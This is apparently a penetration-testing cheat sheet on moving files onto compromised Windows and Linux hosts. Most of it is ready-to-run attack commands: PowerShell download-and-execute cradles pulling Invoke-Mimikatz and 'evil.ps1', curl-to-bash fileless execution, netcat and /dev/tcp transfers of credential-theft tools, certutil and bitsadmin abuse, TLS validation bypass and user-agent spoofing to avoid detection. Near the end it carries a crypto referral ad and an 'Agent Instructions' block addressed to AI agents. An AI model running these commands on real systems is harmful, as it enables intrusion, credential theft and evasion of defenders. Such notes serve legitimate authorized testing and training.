# Upload

## Tool

Updog

```
updog --ssl --port 9090 --password "exegol4thewin" --directory /opt/resources
```

## Living Off Trusted Sites

{% embed url="<https://lots-project.com/>" %}

## Wget and cURL

Upload a repo

`git clone` on attacker host

victim

```
wget --mirror http://IP/rep/
```

### **Create a Web Server on attacker machine**

#### Updog

#### Windows - HFS HTTP File Server

{% embed url="<https://sourceforge.net/projects/hfs/>" %}

#### Powershell\_HttpServer

{% embed url="<https://github.com/zh54321/PowerShell_HttpServer>" %}

#### Python 3

```shell-session
python3 -m http.server 8000
```

#### Python 2.7

```shell-session
python2.7 -m SimpleHTTPServer
```

#### PHP

```shell-session
php -S 0.0.0.0:8000
```

#### Ruby

```shell-session
ruby -run -ehttpd . -p8000
```

### **Upload file**

```shell-session
wget http://10.10.14.1:8000/linenum.sh
```

```shell-session
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
```

```shell-session
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh
```

```shell-session
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
```

**Fileless Upload**

1. with cURL

```shell-session
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
```

2. with wget

```shell-session
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
```

### Bash

```shell-session
# Connect to the target server
$ exec 3<>/dev/tcp/10.10.10.32/80
# HTTP Get request
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
# Print the response
$ cat <&3
```

## SCP

{% embed url="<https://linuxize.com/post/how-to-use-scp-command-to-securely-transfer-files/>" %}

### SSH on attacker host

```shell-session
# Enabling the SSH server
$ sudo systemctl enable ssh
# Starting the SSH server
$ sudo systemctl start ssh
```

```shell-session
scp plaintext@192.168.49.128:/root/myroot.txt . 
```

### SSH on remote host

```shell-session
scp linenum.sh user@remotehost:/tmp/linenum.sh
```

## Base64

### **Linux - Transfer from attack host to victim**

1. Example 1

```shell-session
base64 shell -w 0

f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU
```

```shell-session
echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
```

2. Example 2

```shell-session
$ cat id_rsa |base64 -w 0;echo

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KY ... <SNIP>
```

```shell-session
$ echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQk... <SNIP> CamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa
```

### **Windows - Transfer from attack host to victim**

```shell-session
$ cat id_rsa |base64 -w 0;echo

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0V ... <SNIP>
```

```powershell-session
PS C:\htb> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbG... <SNIP> Ed4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo="))
```

## Powershell&#x20;

### DownloadFile method

```powershell-session
PS C:\htb> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\htb> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

PS C:\htb> # Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\htb> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'C:\Users\Public\Downloads\PowerViewAsync.ps1')
```

```shell-session
$ echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZn... <SNIP> N0DQo= | base64 -d > hosts
```

### DownloadString - Fileless Method

Execution in memory

```powershell-session
PS C:\htb> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
```

```powershell-session
PS C:\htb> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
```

### Cradles

{% embed url="<https://github.com/danielbohannon/Invoke-CradleCrafter/tree/master>" %}

```
iex(New-ObjectNet.WebClient).DownloadString('https://webserver/payload.ps1')
```

```
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
```

```
iex(iwr'http://192.168.230.1/evil.ps1')
```

```
$h=New-Object-ComObjectMsxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex$h.responseText
```

```
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```

### Invoke-WebRequest

```powershell-session
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
```

```powershell-session
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
```

alias iwr, curl or wget

```powershell-session
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
```

```powershell-session
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust
relationship for the SSL/TLS secure channel."
At line:1 char:1
+ IEX(New-Object Net.WebClient).DownloadString('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
PS C:\htb> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

#### **Changing User Agent - Avoid Detection**

```powershell-session
PS C:\htb>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Name       : InternetExplorer
User Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

Name       : FireFox
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

Name       : Chrome
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0
             Safari/534.6

Name       : Opera
User Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

Name       : Safari
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0
             Safari/533.16
```

Request with Chrome User Agent

```powershell-session
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
```

### Invoke-RestMethod

```powershell-session
PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
```

### WinHttpRequest

```powershell-session
PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.ResponseText
```

### Msxml2

```powershell-session
PS C:\htb> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.responseText
```

## SMB&#x20;

{% embed url="<https://wiki.hpc.uconn.edu/index.php/File_transfer_via_SMB>" %}

### From Linux to Windows

```shell-session
$ sudo impacket-smbserver share -smb2support /tmp/smbshare

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

```cmd-session
C:\htb> copy \\192.168.220.133\share\nc.exe

        1 file(s) copied.
```

#### Unauthenticated guest access blocked

```cmd-session
C:\htb> copy \\192.168.220.133\share\nc.exe

You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
```

SMB server with credz

```shell-session
$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

Mount SMB server with credz

```cmd-session
C:\htb> net use n: \\192.168.220.133\share /user:test test

The command completed successfully.

C:\htb> copy n:\nc.exe
        1 file(s) copied.
```

### Metasploit - Upload

{% content-ref url="../tools/metasploit" %}
[metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit)
{% endcontent-ref %}

### SMBclient - put

{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}

```
put <nom_de_fichier_local> [nom_de_fichier_distant]
```

Source:&#x20;

{% embed url="<http://www.delafond.org/traducmanfr/man/man1/smbclient.1.html>" %}

### SMBmap - upload

{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}

```shell-session
$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

[+] Starting upload: test.txt (20 bytes)
[+] Upload complete.
```

## FTP

### From Linux to Windows

```shell-session
$ sudo pip3 install pyftpdlib
```

```shell-session
$ sudo python3 -m pyftpdlib --port 21

[I 2022-05-17 10:09:19] concurrency model: async
[I 2022-05-17 10:09:19] masquerade (NAT) address: None
[I 2022-05-17 10:09:19] passive ports: None
[I 2022-05-17 10:09:19] >>> starting FTP server on 0.0.0.0:21, pid=3210 <<<
```

```powershell-session
PS C:\htb> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
```

or

```cmd-session
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET file.txt >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye

C:\htb>more file.txt
This is a test file
```

## Python

```shell-session
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
```

```shell-session
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")
```

## PHP

```shell-session
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
```

```shell-session
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
```

```shell-session
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```

## Ruby

```shell-session
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
```

## Perl

```shell-session
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
```

## Javascript

#### Windows

Create `wget.js` with this content

```javascript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

```cmd-session
C:\htb> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
```

## VBScript

Create `wget.vbs` with this content

```vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

```cmd-session
C:\htb> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
```

## Netcat (nc)

nc.exe:

{% embed url="<https://github.com/int0x33/nc.exe/>" %}

### **Simple example**

1. Victim

```shell-session
nc -l -p 8000 > SharpKatz.exe
```

2. Attacker

```shell-session
nc -q 0 192.168.49.128 8000 < SharpKatz.exe
```

### **Inbound connections blocked**

1. Attack host

```shell-session
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

2. Victim

```shell-session
nc 192.168.49.128 443 > SharpKatz.exe
```

## Ncat (ncat)

```
#Receiver
nc -nlvp PORT ­> file

#Sender
nc -nv IP PORT < file_to_send
```

### **Simple example**

1. Victim

```shell-session
ncat -l -p 8000 --recv-only > SharpKatz.exe
```

2. Attacker

```shell-session
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
```

### **Inbound connections blocked**

1. Attack host

```shell-session
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

2. Victim

```shell-session
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
```

## Bash

1. Attack host

```shell-session
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

or

```shell-session
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

2. Victim

```shell-session
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
```

## WinRM

### **Powershell**

```powershell-session
PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True
```

```powershell-session
PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01
```

```powershell-session
PS C:\htb> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
```

### **Evil-WinRM**

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop
```

## RDP

### rdesktop

```shell-session
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

### xfreerdp

```shell-session
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

### Remmina&#x20;

{% embed url="<https://cat.pdx.edu/platforms/linux/remote-access/file-sharing-rdp-from-linux/>" %}

### Windows to windows:

{% embed url="<https://www.helpwire.app/blog/remote-desktop-transfer-files/>" %}

## LOLBAS

{% embed url="<https://lolbas-project.github.io/#/download>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F67TsgYpDdOMSOIY8HuZ4%2FPasted%20image%2020240408061550.png?alt=media&#x26;token=451e4d4a-2639-4a37-9304-8ef2d884a0e7" alt=""><figcaption></figcaption></figure>

### **Bitsadmin**

```powershell-session
PS C:\htb> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
```

```powershell-session
PS C:\htb> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

```powershell-session
PS C:\htb> Import-Module bitstransfer;
PS C:\htb> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
PS C:\htb> $r=gc $env:temp\t;
PS C:\htb> rm $env:temp\t; 
PS C:\htb> iex $r
```

### **Certutil**

```cmd-session
C:\htb> certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
```

```cmd-session
C:\htb> certutil -urlcache -split -f http://10.10.10.32/nc.exe 
```

```
certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exehttps://wiki.hpc.uconn.edu/index.php/File_transfer_via_SMB
```

### **GfxDownloadWrapper.exe**

```powershell-session
PS C:\htb> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
```

## GTFOBins

{% embed url="<https://gtfobins.github.io/#+file%20download>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F04vdjG2eFKjGpqJaWoSu%2FPasted%20image%2020240408061936.png?alt=media&#x26;token=ee74b1f5-0dc1-437c-877c-a61b9715ea38" alt=""><figcaption></figcaption></figure>

### **OpenSSL**

1. Attack host

```shell-session
## Create cetificate
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
## Stand up the server
$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
```

2. Victim

```shell-session
$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
```

## Metasploit

{% content-ref url="../tools/metasploit" %}
[metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit)
{% endcontent-ref %}

```
meterpreter > cd James\\
meterpreter > cd Desktop\\
meterpreter > upload /root/.local/share/pipx/venvs/pwncat-cs/lib/python3.11/site-packages/pwncat/data/PowerSploit/Recon/PowerView.ps1
```

## Avoid AV Detection

**NetLoader and Assembly Loader** - See Payload Delivery in Static Analysis

{% content-ref url="../../antivirus-evasion-defender/static-analysis" %}
[static-analysis](https://0xss0rz.gitbook.io/0xss0rz/antivirus-evasion-defender/static-analysis)
{% endcontent-ref %}

## Resources

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/>" %}

{% embed url="<https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/>" %}

{% embed url="<https://ppn.snovvcrash.rocks/pentest/infrastructure/file-transfer>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FtT3srZzbUxV8iN6zjNrl%2Fimage.png?alt=media&#x26;token=962e4759-e8b9-4e26-b998-6df524fdfaf8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/file-transfer/upload.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.